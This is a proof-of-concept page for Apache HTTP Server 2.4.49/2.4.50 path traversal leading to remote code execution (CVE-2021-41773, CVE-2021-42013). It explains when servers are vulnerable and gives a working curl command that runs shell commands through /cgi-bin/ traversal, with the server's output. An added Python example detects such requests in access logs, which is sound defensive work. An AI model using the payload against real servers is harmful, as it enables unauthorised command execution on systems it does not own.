POC details: 0b30e7c7b4bf543c4fe05da5fa7a66e44df94b27

Source
Related vulnerability
Title: Apache HTTP Server path traversal vulnerability (CVE-2021-41773)
Description: Apache HTTP Server is an open-source web server from the Apache Software Foundation (USA). The server is fast, reliable and extensible through a simple API. Apache HTTP Server 2.4.49 has a path traversal vulnerability; an attacker can use it to map URLs to files outside the expected document root.
Description
Remote Code Execution exploit for Apache servers. Affected versions: Apache 2.4.49, Apache 2.4.50
Introduction
## RCE exploit both for Apache 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013):

IMHO only "special" setups will be vulnerable to this RCE.\
Same happens for the "arbitrary file read" exploits you have seen.

Both CVEs are indeed almost the same path-traversal vulnerability (the second is the incomplete fix for the first).\
Path traversal only works from a mapped URI (e.g. via the "Alias" or "ScriptAlias" Apache directives). DocumentRoot alone is not sufficient.

"/cgi-bin/" is mapped by default (ScriptAlias), which is why it is used before the path traversal string.\
Besides, ScriptAlias marks all the contents of the given directory as executable (for Apache), regardless of the file extension.

### Requirements:
1/ mod_cgi enabled (not default but easy)\
2/ target binary should be +x (default for /bin/sh)\
3/ apache permissions granted for /bin or / (not default and difficult/unrealistic)\

### Check if server is vulnerable:
`curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'`

### Response from a vulnerable server:
`uid=1(daemon) gid=1(daemon) groups=1(daemon)`
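To spot requests like the check above in Apache access logs, here is an added defender-side example (not code from the PoC repository): it percent-decodes the request target repeatedly, because the 2.4.50 bypass double-encodes the dots (`%%32%65`), and flags targets that climb above a mapped prefix such as `/cgi-bin/`. The log lines are constructed, and the prefix list is an assumption for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined log format (not from a real server).
SAMPLE_LOG = """\
203.0.113.5 - - [05/Oct/2021:10:00:01 +0000] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 200 52 "-" "curl/7.79.1"
203.0.113.5 - - [05/Oct/2021:10:00:02 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 52 "-" "curl/7.79.1"
198.51.100.9 - - [05/Oct/2021:10:00:03 +0000] "GET /cgi-bin/status.cgi?q=1 HTTP/1.1" 200 128 "-" "Mozilla/5.0"
198.51.100.9 - - [05/Oct/2021:10:00:04 +0000] "GET /images/../index.html HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

# Extracts method and request target from the quoted request part of a log line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def fully_decode(path, max_rounds=3):
    """Percent-decode until the string stops changing (handles %2e and %%32%65 double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def escapes_prefix(path, prefix="/cgi-bin/"):
    """True if the decoded path climbs above the mapped prefix once '.' and '..' are resolved."""
    if not path.startswith(prefix):
        return False  # traversal from DocumentRoot alone is not the pattern described here
    segments = path[len(prefix):].split("?", 1)[0].split("/")
    depth = 0
    for seg in segments:
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False

def find_traversal_attempts(log_text, prefixes=("/cgi-bin/",)):
    """Return (method, raw_target) for every log line whose decoded target escapes a mapped prefix."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        raw = m.group("target")
        decoded = fully_decode(raw)
        if any(escapes_prefix(decoded, p) for p in prefixes):
            hits.append((m.group("method"), raw))
    return hits
```

Running `find_traversal_attempts(SAMPLE_LOG)` reports the two encoded `/cgi-bin/` requests and ignores the plain `/images/../` one, matching the README's point that the traversal needs a mapped URI.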
File snapshot

[4.0K] /data/pocs/0b30e7c7b4bf543c4fe05da5fa7a66e44df94b27
└── [1.1K] README.md

0 directories, 1 file